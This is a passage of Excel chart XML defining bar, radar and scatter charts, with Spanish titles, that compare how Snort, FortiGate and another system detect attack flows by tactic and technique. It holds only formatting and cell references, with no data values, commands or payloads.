          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$O$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FFF2CC">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$39:$K$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$O$39:$O$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$P$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="4A86E8">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$39:$K$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$P$39:$P$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:axId val="2053975541"/>
        <c:axId val="1844170530"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="2053975541"/>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1844170530"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1844170530"/>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2053975541"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart94.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO TÉCNICAS - SNORT VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:scatterChart>
        <c:scatterStyle val="lineMarker"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$80</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:xVal>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$81:$K$160</c:f>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$81:$L$160</c:f>
              <c:numCache/>
            </c:numRef>
          </c:yVal>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$80</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:xVal>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$81:$K$160</c:f>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$81:$M$160</c:f>
              <c:numCache/>
            </c:numRef>
          </c:yVal>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:axId val="650538006"/>
        <c:axId val="760908818"/>
      </c:scatterChart>
      <c:valAx>
        <c:axId val="650538006"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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760908818"/>
      </c:valAx>
      <c:valAx>
        <c:axId val="760908818"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.05"/>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650538006"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart95.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN DE FLUJOS CON ATAQUE SNORT VS PA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:axId val="1331744250"/>
        <c:axId val="1222019181"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1331744250"/>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1222019181"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1222019181"/>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331744250"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart96.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN FLUJOS CON ATAQUE POR TÁCTICA - SNORT VS PA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$39:$U$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$39:$Y$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="854022236"/>
        <c:axId val="108708826"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="854022236"/>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108708826"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="108708826"/>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854022236"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart97.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO TÉCNICAS - SNORT VS PA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:scatterChart>
        <c:scatterStyle val="lineMarker"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$80</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:xVal>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$81:$T$160</c:f>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$81:$U$160</c:f>
              <c:numCache/>
            </c:numRef>
          </c:yVal>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$80</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:xVal>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$81:$T$160</c:f>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$81:$V$160</c:f>
              <c:numCache/>
            </c:numRef>
          </c:yVal>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:axId val="1881095423"/>
        <c:axId val="1885656782"/>
      </c:scatterChart>
      <c:valAx>
        <c:axId val="1881095423"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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885656782"/>
      </c:valAx>
      <c:valAx>
        <c:axId val="1885656782"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.05"/>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881095423"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart98.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN FLUJOS CON ATAQUE POR TÁCTICA - SNORT VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$39:$K$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$39:$L$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$P$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$39:$K$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$P$39:$P$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="937047930"/>
        <c:axId val="864719097"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="937047930"/>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864719097"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="864719097"/>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937047930"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart99.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN FLUJOS CON ATAQUE POR TÁCTICA - SNORT VS PA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.030764563106796143"/>
          <c:y val="0.14497041420118342"/>
          <c:w val="0.8033840260922329"/>
          <c:h val="0.8050295857988166"/>
        </c:manualLayout>
      </c:layout>
      <c:radarChart>
        <c:radarStyle val="marker"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="7F6000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$U$39:$U$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="F1C232">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$V$39:$V$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FFD966">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$W$39:$W$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FFF2CC">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$X$39:$X$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$38</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FF6D01"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$T$39:$T$51</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$Y$39:$Y$51</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="1"/>
        </c:ser>
        <c:axId val="1696569301"/>
        <c:axId val="358885014"/>
      </c:radarChart>
      <c:catAx>
        <c:axId val="1696569301"/>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358885014"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="358885014"/>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696569301"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart100.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO TÉCNICAS - SNORT VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Snort (RS4)</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$81:$K$160</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$81:$L$160</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$80</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$81:$K$160</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$81:$M$160</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$O$80</c:f>
            </c:strRef>
          </c:tx>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$81:$K$160</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$O$81:$O$160</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="914711951"/>
        <c:axId val="978899372"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="914711951"/>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978899372"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="978899372"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.05"/>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914711951"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart10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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>NÚMERO DE ATAQUES POR TÉCNICA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$N$80</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$81:$K$160</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$N$81:$N$160</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1628020631"/>
        <c:axId val="1122317558"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1628020631"/>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1122317558"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1122317558"/>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Nº Ataques</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628020631"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart10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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN TOTAL DE FLUJOS POR TÁCTICA - FORTIGATE</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FORTIGATE</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$H$16:$U$16</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$H$17:$U$17</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>SNORT RS4</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
